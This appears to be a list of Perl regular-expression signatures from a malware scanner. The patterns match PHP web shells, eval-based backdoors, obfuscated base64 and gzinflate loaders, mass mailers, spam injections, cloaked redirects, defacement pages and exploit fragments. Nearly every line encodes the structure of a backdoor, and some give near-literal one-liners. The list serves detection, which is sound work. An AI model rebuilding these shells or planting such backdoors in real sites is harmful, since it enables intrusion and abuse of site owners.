qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;exit\;\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\/\*([A-z0-9]{1,20})\*\/\"preg\_replace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"preg\_r\"\.\"eplace\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+set\_time\_limit\(0\)\;\s+if\s+\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\=\=\'1\'\)\{echo\s+\'200\'\;\s+exit\;\}.+?if\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\=\=.+?\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+if\(md5\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\=\=.+?\)eval\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+class\s+\_([A-z0-9]{1,20})\{static\s+private\s+\$.+?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.+?\(\)\;exit\(\)\;/is,
qr/<\?php\s+include\(\'wp\-access\-plugin\.php\'\)\;\s+\/\/Email\s+sending\s+function\s+sending\_email\(\$email\,\$id\=\'1\'\)\{.+?<\/div>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+session\_start\(\)\;.+?function\s+sanitizer\(\$check\)\{.+?function\s+validate\_email\(\$email\)\{.+?return\s+\$status\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Net\s+Scrap\s+Shop\s+v3\*\/.+?\=str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(\$.+?\)\;\s+\?>/is,
qr/bgeteam\s+<\?php.+?B\s+Ge\s+Team\s+File\s+Manager.+?value\=\"upload\"\s+\/>.+?\?>\s+B\s+Ge\s+Team\s+File\s+Manager\s+Version\s+1\.0\,\s+Coded\s+By\s+lin\s+Email\:\s+null/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\?>\s+Upload\s+is\s+<b><color>WORKING.+?<\?php\s+if\s+\(\!empty\(\$\_POST\[.+?\}\s+\?>/is,
qr/<\?php\s+\/\*\*.+?\$auth\_pass\s+\=\s+\".+?echo\s+\'changepassword\'\;.+?echo\s+\'Yeahhh\'\;.+?\*\/\s+\}\s+\?>/is,
qr/<\?php.+?Mr\.N00B\s+Mini\s+Shell.+?\$auth\_pass\s+\=.+?eval\(\$st\(\$gz\(\$st2\(\$bs\(\(\$con7ext\)\)\)\)\)\)\;/is,
qr/<\?php\s+\/\*\*\s+\*\s+Leaf.+?\$sessioncode\s+\=\s+md5\(\_\_FILE\_\_\)\;.+?Leaf\s+PHPMailer.+?\}\s+print\s+\'<\/body>\'\;\s+\?>/is,
qr/<title>Hacked\s+By\s+Dr34mCyb3r.+?<\/style>\s+<div\s+class\=\"video\-background.+?allowfullscreen><\/iframe>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'ba\'\.\'se64\_dec\'\.\'o\'\.\'d\'\.\'e\'\.\'\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?\'\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\'\'\,\'.+?\;\$([A-z0-9]{1,20})\.\=\"\\x\d\w\\x\d\d\"\;\s+\$([A-z0-9]{1,20})\.\=\".+?\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\)\;\?>/is,
qr/<\?php\s+if\(isset\(\$\_SERVER\[\"HTTP\_USER_AGENT\"\]\)\s+\&\&\s+\!empty\(\$\_SERVER\[\"HTTP\_USER\_AGENT\"\]\)\s+\&\&\s+\!preg\_match\(\"\/google\|bot\|msn\|spider\|crawl\|spam\/i\"\,\$\_SERVER\[\"HTTP\_USER\_AGENT\"\]\)\)\s+\{\s+header\(\"Location\:\s+http\:\/\/.+?\"\)\;\}\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?\=\s+\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$.+?\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?\(\'e\'\.\'d\'\.\'o\'\.\'c\'\.\'e\'\.\'d\'\.\'\_\'\.\'4\'\.\'6\'\.\'e\'\.\'s\'\.\'a\'\.\'b\'\)\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$.+?\=\s+\'str\'\.\'rev\'\;\$.+?array.+?\(\'edolpmi\'\)\;\$.+?eval.+?\?>/is,
qr/<\?php.+?1337.+?\?>\s+<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?eval\(\"\?>\"\.\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*.+?UBH\s+CSU.+?add\_action\(\"\\x.+?plugins\_url\(.+?\?>/is,
qr/<\?php\s+\$\{\"GLOBAL\\x.+?\"\]\,\"\"\.\$\_FILES\[\".+?\"\]\}\=str\_replace\(\".+?\"\;\}\}\s+\?>/is,
qr/<\?php\s+\/\*\s+b374k.+?if\(isset\(\$\_COOKIE\[\'b374k\'\]\)\)\{.+?\.\$s\_name\;\s+\?><\/p>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+function\s+sgen\(\)\s+\{\$vals\s+\=\s+\"abcdefghijklmnopqrstuvwxyz\"\;\s+\$result\s+\=\s+\"\"\;\s+for\(\$i.+?\.sgen\(\)\.\"\=\"\.bin2hex\(\$\_SERVER\[.+?exit\;\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x\d\d.+?\\x3b\"\)\;\s+\?>/is,
qr/<\?php\s+if\(\!isset\(\$GLOBALS\[\"\\x\d\d.+?\]\)\)\s+\{\s+\$ua\=strtolower\(\$\_SERVER\[\"\\x\d\d.+?\)\)\)\s+\$GLOBALS\[\"\\x\d\d.+?\]\=1\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0.+?return\s+base64\_decode\(\$([A-z0-9]{1,20})\)\;\}\s+\$([A-z0-9]{1,20}).+?eval\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php.+?hello\_dolly.+?\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x\d\d.+?\\x3b\"\)\;.+?add\_action\(\s+\'admin\_head\'\,\s+\'dolly\_css\'\s+\)\;\s+\?>/is,
qr/<\?php\s+\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"x.+?\"\)\;\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php.+?\$pos\s+\=\s+strpos\(\$haystack\,\s+\$needle\)\;.+?function\s+mailer\_spam\_cycle\(.+?\'OK\'\)\;\s+\}/is,
qr/<html>.+?parent\.window\.opener\.location\=\"http\:\/\/redirg\.info\/\?access\=.+?<\/html>/is,
qr/<\?php.+?\{if\(is\_uploaded\_file\(\$\_FILES\[\"filename\"\]\[\"tmp\_name\"\]\)\)\{.+?\@eval\(\$uidmail\)\;\s+\}/is,
qr/([0-9]{20,})<\?php\s+\@eval\(\$\_POST\[\'c\'\]\)\;\s+die\(\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;echo\'404\-NOT\-FOUND\-ERROR\'\;\s+\$([A-z0-9]{1,20})\=gzinflate\(base64\_decode\(.+?\}\}closedir\(\$([A-z0-9]{1,20})\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\;\?>/is,
qr/<\?php.+?Joomla\.Site.+?\$p\s+\=\s+getcwd\(\)\;\s+echo\s+\$p\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?\(\)\;\s+\?>/is,
qr/<\?PHP\s+\$login.+?\$pass.+?\$md5\_pass\s+\=\s+\"\"\;\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\/\/\?\?\?\?\?\s+\?>/is,
qr/<\?php.+?if\(\$chk\_login\s+\=\=\s+true\).+?mass\s+mailer\s+\|\:\..+?Sending\s+Completed.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?\@system\(\"killall\s+\-9\s+\"\.basename\(\"\/usr\/bin\/host\"\)\)\;.+?\$so32\s+\=\s+\"\\x.+?\/usr\/bin\/host\"\)\;\s+\?>/is,
qr/<\?php\s+eval\s+\(gzinflate\(base64\_decode\(str\_rot13\(.+?\)\)\)\)\;\s+\?>/is,
qr/\#\!\/bin\/sh.+?sd\@fucksheep\.org.+?\.\/exploit\s+fi/is,
qr/<\?php.+?eMail\s+\~>\s+RealUnix\.net.+?print\s+file\_get\_contents\(\$i\)\;\s+exit\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?class\s+viaWorm\s+\{.+?public\s+function\s+analyzePossibleIndexes\(\)\{.+?\$result\s+\=\s+viaWorm\:\:processHost\(\)\;.+?echo\s+json\_encode\(\$result\)\;\s+exit\(\)\;/is,
qr/<html>.+?Owned\s+by\s+Widex.+?root\@Widex\:\s+\.\/logout<\/p>\s+<\/body>\s+<\/html>/is,
qr/\/\*\s+exploit\s+lib\s+\*\/.+?struct\s+exploit\_state\s+\{.+?pa\_\_init\(NULL\)\;\s+return\s+0\;\s+\}/is,
qr/\/\*.+?sd\@fucksheep\.org.+?struct\s+exploit\_state\s+\{.+?unlink\(\"\.\/suckit\_selinux\_nopz\"\)\;\s+exit\(1\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\_\"\.\'G\'\.\'E\'\.\'T\'\;\s+if\s+\(isset\(\s+\$\{\$([A-z0-9]{1,20})\}\[\'\d\d\'\]\)\)\s+preg\_replace\(\'\/\'\.\'\.\*\/e\'\,\s+\'ev\'\.\'al\s+\(\s+\$\'\.\$([A-z0-9]{1,20})\.\'\[\"\d\d\"\]\)\'\,\s+\'\'\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\)eval\(\/\*\'\..+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\,\$([A-z0-9]{1,20})\(null\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\;if\(\!\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\/\*\'\.\s+\'\)\*\/\$([A-z0-9]{1,20})\)\)\,\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\(.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\'\.\s+\'.+?\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\..+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?die\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(false\,\/\*.+?\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\'\.\/\*([A-z0-9]{1,20})\'\.\s+\'\?\*\/([A-z0-9]{1,20})\.\'.+?\*\/\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\$.+?\(false\,\/\*([A-z0-9]{1,20})\'\.\s+\'([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\=\=\$([A-z0-9]{1,20})\.\/\*([A-z0-9]{1,20})\'\..+?\$([A-z0-9]{1,20})\(false\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,array\(\$([A-z0-9]{1,20})\,\/\*([A-z0-9]{1,20})\'\.\s+\'([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\,\$([A-z0-9]{1,20})\)\)\;.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'.+?\*\/\$([A-z0-9]{1,20})\)\)\,\$([A-z0-9]{1,20})\)\)exit\;\$([A-z0-9]{1,20})\(\$.+?array\(\(\'.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\W.+?\*\/\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20}).+?\'\@\@\@\@.+?\)\;if\(\!\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\,\/\*\'\..+?\'\;/is,
qr/<\?php\s+\$key\=\"([A-z0-9]{32})\"\;\s+if\(md5\(\$\_COOKIE\[\"key\"\]\)\s+\=\=\s+\$key\)\s+\{\s+eval\s+\(\s+base64\_decode\s+\(\$\_POST\[\"code\"\]\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[.+?urldecode\(\$\_SERVER\[\'QUERY\_STRING\'\]\)\;.+?\$email\s+\=\s+\@base64\_decode\(\$.+?return\s+jk\_\_\_\(\$url\)\;\s+\}\s+\}\s+\}/is,
qr/<\?php\s+\$.+?\=\s+array\(\'.+?array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;\s+\$.+?array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?64\_d.+?array\(.+?eval.+?\$([A-z0-9]{1,20}).+?\?>/is,
qr/<\?php.+?\$color\s+\=\s+\"\#df5\"\;.+?FilesMan.+?\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\[pageerror\]\/e\"\,\$\_POST\[\'([A-z0-9]{1,20})\'\]\,\"([A-z0-9]{1,20})\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(\"\w\"\,\"\"\,\"s\wtr\w\_\wr\we\wpl\wa\wc\we\"\)\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\"\;\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20})\=\=\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\"\wb\wa\ws\we6\w4\w_d\we\wco\wde\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\"\w\"\,\"\"\,\"cr\we\wat\we\w\_\wf\wu\wnc\wt\wi\won\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\'\'\,\s+\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\"\w\"\,\s+\"\"\,\s+\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\)\;\s+\/\/\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\/\*\*\*\*find\s+config\s+files\*\*\*\*\/.+?if\s+\(\!\$ErrorMsg\)\{.+?\}\s+\?>/is,
qr/<\?php\s+\$wphash.+?\$rootpath\s+\=\s+preg\_replace\(\'\/\(htdocs\|httpdocs\|www\).+?\$ErrorMsg\s+\=\s+mysql\_error\(\)\;.+?\}\s+\?>/is,
qr/<\?php\s+\$auth\_pass\s+\=.+?\(base64\_decode\(.+?\)\;\$\_\=create\_function\(\"\"\,\@gzuncompress\(\$\_\_\)\)\;\$\_\(\)\;\?>/is,
qr/<\?php\s+\$zend\_framework\=\"\\x\d\d.+?\"\;\s+\@error\_reporting\(0\)\;\s+\$zend\_framework\(\"\"\,.+?\\x\d\w\"\)\;\s+\?>/is,
qr/\$cookey\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+preg\_replace\(\"\\x23.+?x3b\"\)\;/is,
qr/<\?php\s+if\(\@isset\(\$\_SERVER\[HTTP\_25F0C\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[HTTP\_25F0C\]\)\)\;\}exit\;\?>/is,
qr/<\?php.+?\=\_\_FILE\_\_\;\$.+?\_\_LINE\_\_\;\$.+?eval\(\(base64\_decode\(.+?\)\)\)\;return\;\?>.+?\/([A-z0-9]{1,20})\=/is,
qr/\$([A-z0-9]{1,20})\s+\=\s+\"\/index\/\?([A-z0-9]{1,20})\"\;.+?\{\$([A-z0-9]{1,20})\=\@fopen\(\$([A-z0-9]{1,20})\,base64\_decode\(.+?\)\)\;\$([A-z0-9]{1,20})\=json\_decode\(base64\_decode\(fread\(\$([A-z0-9]{1,20})\,filesize\(.+?\{setcookie\(base64\_decode\(\'.+?\'\)\,1\,time\(\)\+43200\,base64\_decode\(\'.+?\'\)\)\;echo\s+base64\_decode\(\'([A-z0-9]{20,})\'\)\.\$([A-z0-9]{1,20})\.base64\_decode\(\'([A-z0-9]{20,})\'\)\.\$([A-z0-9]{1,20})\.base64\_decode\(\'.+?\'\)\;\}/is,
qr/<\?php\s+\@set\_time\_limit\(9999\)\;.+?\$imgurl\s+\=\s+base64\_decode\(\$\_GET\[\'getimage\'\]\)\;.+?function\s+traffic\_counter\(\)\{.+?file\_put\_contents\(\$path\,\s+\$file\)\;\s+return\s+true\;\s+\}\s+\?>/is,
qr/<\?php.+?wpsecurity.+?function\s+injectbody\_hide\(\$plugins\)\s+\{.+?\/\/\s+\}\s+\/\/\}\)\;/is,
qr/<\?php.+?wpsupercache.+?function\s+injectscr\_hide\(\$plugins\)\s+\{.+?add\_filter\(\'all\_plugins\'\,\s+\'injectscr\_hide\'\)\;/is,
qr/<script\s+data\-cfasync\=\'false\'\s+type\=\'text\/javascript\'>\s+eval\(function\(p\,a\,c\,k\,e\,d\)\{e\=function\(c\)\{return\(c<a\?\'\'\:e\(parseInt\(c\/a\)\)\).+?split\(\'\|\'\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[\'upload\'\]\)\)\{.+?if\s+\(move\_uploaded\_file\(\$\_FILES\[\'uploadfile\'\]\[\'tmp\_name\'\]\,\s+\$uploadfile\)\).+?else\s+\{header\(\'Location\:\s+\.\.\/\.\.\/\'\)\;\}\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$([A-z0-9]{1,20})\=\".+?\"\;preg\_replace\(\"\/\.\*\/e\"\,\"\\x\d\d.+?\\x3B\"\,\"\.\"\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x47LOB.+?\@ini\_set\(\"\\x65.+?WSOsetcookie\(md5\(\$\_SERVER\[.+?\.\$\_POST\[\"a\"\]\)\;exit\;\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$buffer\s+\=.+?\$newphrase\=str\_replace\(\$.+?eval\(\$\_b\(\$newphrase\)\)\;\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$s\_pass\s+\=.+?b374k.+?\,\$s\_pass\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;\s+\$ver\s+\=\s+\'6\.6\.6\'\;.+?exit\(\'Access\s+Denied\'\)\;.+?if\s+\(\$cracktrack\s+\!\=\s+\$checkworm\)\s+die\(\"\"\)\;\s+\}\s+\?>/is,
qr/<\?php\s+Error\_Reporting\(0\)\;\s+\$([A-z0-9]{1,20})\=.+?\\x3B\"\,\"\.\"\)\;return\;\s+\?>/is,
qr/<\?php\s+echo\s+\"<html><head>.+?echo\s+\"<\!\-\-\s+g\(\'FilesMan\'\,\'c\:\/\'\)\s+\-\-\!>\"\;.+?function\s+wscandir\(\$cwdir\)\s+\{.+?echo\s+\"<\/body><\/html>\"\;/is,
qr/\/\/eAccelerate\s+Caching\s+System.+?\!preg\_match\(\"\/\(googlebot\|msnbot\|yahoo\|search\|bing\|ask\|indexer\)\/i\".+?base64\_decode\(.+?\)\:\(\'\'\)\)\.\$output\;\}/is,
qr/<\?php\s+function\s+html\(\$data\)\s+\{\s+\$html\=implode\(.+?array\_unshift\(\$data.+?\$words\_idx\=array\_rand\(\$words\,rand\(\$min\,\$max\)\)\;.+?\"h\"\.\"tac\"\.\"c\"\.\"es\"\.\"s\"\;\$.+?header\(\"HTTP\/1\.1\s+404\s+Not\s+Found\"\)\;echo\(html\(array\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+for\(\$o\=0\,\$e\=\'.+?\'\,\$d\=\'\'\;\@ord\(\$e\[\$o\]\)\;\$o\+\+\)\{if\(\$o<16\)\{\$h\[\$e\[\$o\]\]\=\$o\;\}else\{\$d\.\=\@chr\(\(\$h\[\$e\[\$o\]\]<<4\)\+\(\$h\[\$e\[\+\+\$o\]\]\)\)\;\}\}eval\(\$d\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"PCT4BA6ODSE\_\"\;\$([A-z0-9]{1,20})\=strtolower\(\$([A-z0-9]{1,20})\[.+?\]\;if\(isset\(\$([A-z0-9]{1,20})\)\)\{eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\}\?>/is,
qr/<\?\s+\$auth\_pass\s+\=.+?FilesMan.+?eval\(base64\_decode\(.+?return\;\s+\?>/is,
qr/RewriteEngine\s+on\s+RewriteCond\s+\%\{HTTP\_USER\_AGENT\}\s+android\s+\[NC\,OR\].+?RewriteRule\s+\^\(\.\*\)\$\s+http\:\/\/sswim\.ru\s+\[L\,R\=302\]/is,
qr/<\?php\s+\/\*\*\/\s+eval\(base64\_decode\(\"aWYo.+?\)\)\;\?>/is,
qr/<\?php.+?\$auth\_pass.+?FilesMan.+?header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<div\s+id\=\'HideMeBetter\'>.+?document\.getElementById\(\'HideMeBetter\'\)\.style\.display\s+\=\s+\'none\'\;\}<\/script>/is,
qr/<\!\-\-start\-add\-div\-content\-\-><p\s+class\=\"dnn\">.+?Viagra.+?<\/p><\!\-\-end\-add\-div\-content\-\->/is,
qr/<script\s+language\=\"JavaScript\">\s+function\s+dnnViewState\(\).+?dnnViewState\(\)\;\s+<\/script>/is,
qr/<\?php\s+\$\_([A-z0-9]{1,20})\=\"\\x([A-z0-9]{2}).+?\\x([A-z0-9]{2})\"\;\$\_([A-z0-9]{1,20})\=\"\\x([A-z0-9]{2}).+?\)\)\;\$\_([A-z0-9]{1,20})\(\)\;\?>/is,
qr/<\?php.+?Parabola.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+html\(\$data\).+?array\_unshift\(\$data\,.+?array\_push\(\$parag\,\$word\)\;.+?echo\(html\(array\(.+?\?>/is,
